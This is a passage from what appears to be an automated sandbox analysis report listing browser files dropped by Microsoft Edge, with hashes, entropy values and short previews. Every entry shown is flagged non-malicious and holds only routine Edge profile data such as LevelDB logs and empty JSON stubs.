                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                                  MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                                  SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                                  SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                                  SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):434
                                                                                                                                                                                                                                                                  Entropy (8bit):5.253598325492489
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPr+q2P923oH+TcwtzjqEKj3K/2jMGIFUt8OoPRjZZmw+OoPjNVkwO923oH+Tcd:7tv4YebvqBQFUt8O4Z/+O+5LYebvqBvJ
                                                                                                                                                                                                                                                                  MD5:58B903C08E4314DFEA1D96A754ECD2A2
                                                                                                                                                                                                                                                                  SHA1:554C8C26BAD4DB77B42944ED07C62B94C0F18F96
                                                                                                                                                                                                                                                                  SHA-256:29FC11CE903D2801267E3A096752B3EBF87ECFB8D1B2E8D1160541762AB67E3D
                                                                                                                                                                                                                                                                  SHA-512:FC1F5997AC4956B62D2D5612C246EFD734D0CF8049714DC5C9E4A6707B6841F07C580CF51C63FF903ACE88CA465DE0B1A61D6B331DCC3A9CEA6EBDADBE6BCC77
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:20.253 1e68 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/19-07:44:20.257 1e68 Recovering log #3.2024/12/19-07:44:20.260 1e68 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):434
                                                                                                                                                                                                                                                                  Entropy (8bit):5.253598325492489
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPr+q2P923oH+TcwtzjqEKj3K/2jMGIFUt8OoPRjZZmw+OoPjNVkwO923oH+Tcd:7tv4YebvqBQFUt8O4Z/+O+5LYebvqBvJ
                                                                                                                                                                                                                                                                  MD5:58B903C08E4314DFEA1D96A754ECD2A2
                                                                                                                                                                                                                                                                  SHA1:554C8C26BAD4DB77B42944ED07C62B94C0F18F96
                                                                                                                                                                                                                                                                  SHA-256:29FC11CE903D2801267E3A096752B3EBF87ECFB8D1B2E8D1160541762AB67E3D
                                                                                                                                                                                                                                                                  SHA-512:FC1F5997AC4956B62D2D5612C246EFD734D0CF8049714DC5C9E4A6707B6841F07C580CF51C63FF903ACE88CA465DE0B1A61D6B331DCC3A9CEA6EBDADBE6BCC77
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:20.253 1e68 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/19-07:44:20.257 1e68 Recovering log #3.2024/12/19-07:44:20.260 1e68 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\06fe8c50-05fc-420a-8015-bfdc6d5d9f8c.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\2da219c5-d765-4d77-b0a1-892edb11ad9d.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\563a4bad-5624-48f5-8162-797a974d1754.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):144
                                                                                                                                                                                                                                                                  Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                                  MD5:ABE81C38891A875B52127ACE9C314105
                                                                                                                                                                                                                                                                  SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                                  SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
                                                                                                                                                                                                                                                                  SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF394fe.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                  Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                  MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                  SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                  SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                  SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\ade9ac4b-0f23-4fed-af8a-d240117d5bb6.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):144
                                                                                                                                                                                                                                                                  Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                                  MD5:ABE81C38891A875B52127ACE9C314105
                                                                                                                                                                                                                                                                  SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                                  SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
                                                                                                                                                                                                                                                                  SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                                                                                                                  Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                  MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                  SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                  SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                  SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):422
                                                                                                                                                                                                                                                                  Entropy (8bit):5.231743825742039
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oyAHq2P923oH+TcwtzjqEKj0QMxIFUt8OoyAvZmw+OoyAKkwO923oH+Tcwtzjqg:7wv4YebvqBZFUt8O4/+OH5LYebvqBaJ
                                                                                                                                                                                                                                                                  MD5:8B75CEACDE756B7CB15DAE1194A31962
                                                                                                                                                                                                                                                                  SHA1:05269D063D48AAC75F1E325F16D9C55A1AE38D3B
                                                                                                                                                                                                                                                                  SHA-256:0113FC16F36EF7730917D2C8E23ABF7F826494420FEAAF481557BFCFFADC5060
                                                                                                                                                                                                                                                                  SHA-512:2D187ED058BF41243EA98CD95AD9FD24CCAC31A2E2801B0B87216EC75C4859A1D575ECEC8AD98CE9CDAF02968299B7C3DAF2EA6A0775694DA3AE64737F6A8000
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:38.031 1e44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/19-07:44:38.032 1e44 Recovering log #3.2024/12/19-07:44:38.035 1e44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):422
                                                                                                                                                                                                                                                                  Entropy (8bit):5.231743825742039
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oyAHq2P923oH+TcwtzjqEKj0QMxIFUt8OoyAvZmw+OoyAKkwO923oH+Tcwtzjqg:7wv4YebvqBZFUt8O4/+OH5LYebvqBaJ
                                                                                                                                                                                                                                                                  MD5:8B75CEACDE756B7CB15DAE1194A31962
                                                                                                                                                                                                                                                                  SHA1:05269D063D48AAC75F1E325F16D9C55A1AE38D3B
                                                                                                                                                                                                                                                                  SHA-256:0113FC16F36EF7730917D2C8E23ABF7F826494420FEAAF481557BFCFFADC5060
                                                                                                                                                                                                                                                                  SHA-512:2D187ED058BF41243EA98CD95AD9FD24CCAC31A2E2801B0B87216EC75C4859A1D575ECEC8AD98CE9CDAF02968299B7C3DAF2EA6A0775694DA3AE64737F6A8000
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:38.031 1e44 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/19-07:44:38.032 1e44 Recovering log #3.2024/12/19-07:44:38.035 1e44 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                  Entropy (8bit):5.210352164497145
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oL+q2P923oH+TcwtpIFUt8OoxqZZmw+OoLUBPNVkwO923oH+Tcwta/WLJ:74+v4YebmFUt8O3/+OkUPV5LYebaUJ
                                                                                                                                                                                                                                                                  MD5:F46BC454E989CE8A9CFDF820CD800114
                                                                                                                                                                                                                                                                  SHA1:B787C40609619609C32AFECE4EB59CDAE0A7F438
                                                                                                                                                                                                                                                                  SHA-256:5FB6EE2767155579AF6D047F5BB4BF7C4DF4BDB4E767757DEB48A8DD26D23997
                                                                                                                                                                                                                                                                  SHA-512:D8C53461A16E069E2F4C67347DF7A5EB40A25112CAB06E7908B4E34273A2E47246D8B0FA35BD55656EB4A8A5886BEB54A29568EE28C68446E931185663B433AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:19.504 1d7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/19-07:44:19.505 1d7c Recovering log #3.2024/12/19-07:44:19.507 1d7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                  Entropy (8bit):5.210352164497145
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oL+q2P923oH+TcwtpIFUt8OoxqZZmw+OoLUBPNVkwO923oH+Tcwta/WLJ:74+v4YebmFUt8O3/+OkUPV5LYebaUJ
                                                                                                                                                                                                                                                                  MD5:F46BC454E989CE8A9CFDF820CD800114
                                                                                                                                                                                                                                                                  SHA1:B787C40609619609C32AFECE4EB59CDAE0A7F438
                                                                                                                                                                                                                                                                  SHA-256:5FB6EE2767155579AF6D047F5BB4BF7C4DF4BDB4E767757DEB48A8DD26D23997
                                                                                                                                                                                                                                                                  SHA-512:D8C53461A16E069E2F4C67347DF7A5EB40A25112CAB06E7908B4E34273A2E47246D8B0FA35BD55656EB4A8A5886BEB54A29568EE28C68446E931185663B433AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:19.504 1d7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/19-07:44:19.505 1d7c Recovering log #3.2024/12/19-07:44:19.507 1d7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):131072
                                                                                                                                                                                                                                                                  Entropy (8bit):0.0033616753448762224
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:ImtVuAZ+RDAlt:IiVuAA+X
                                                                                                                                                                                                                                                                  MD5:DCCB82561AAFE31C32E5F0EDF9EC9382
                                                                                                                                                                                                                                                                  SHA1:4A98F0030D9D0B90D34516FB1707BA2E990FCCD0
                                                                                                                                                                                                                                                                  SHA-256:C295BD9E51FC031C5D4FB720E802FFD62B4BDFC0978F80073190C3584976B1B2
                                                                                                                                                                                                                                                                  SHA-512:F73A4D541B4340FFB137DFA8F018CE52EBA1ACA7C611790F08D5B79E559501DA21DE41885042288D7A5DB5626526821DB1B486596736854856A2A2DB301450CE
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:VLnk.....?......?......+................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

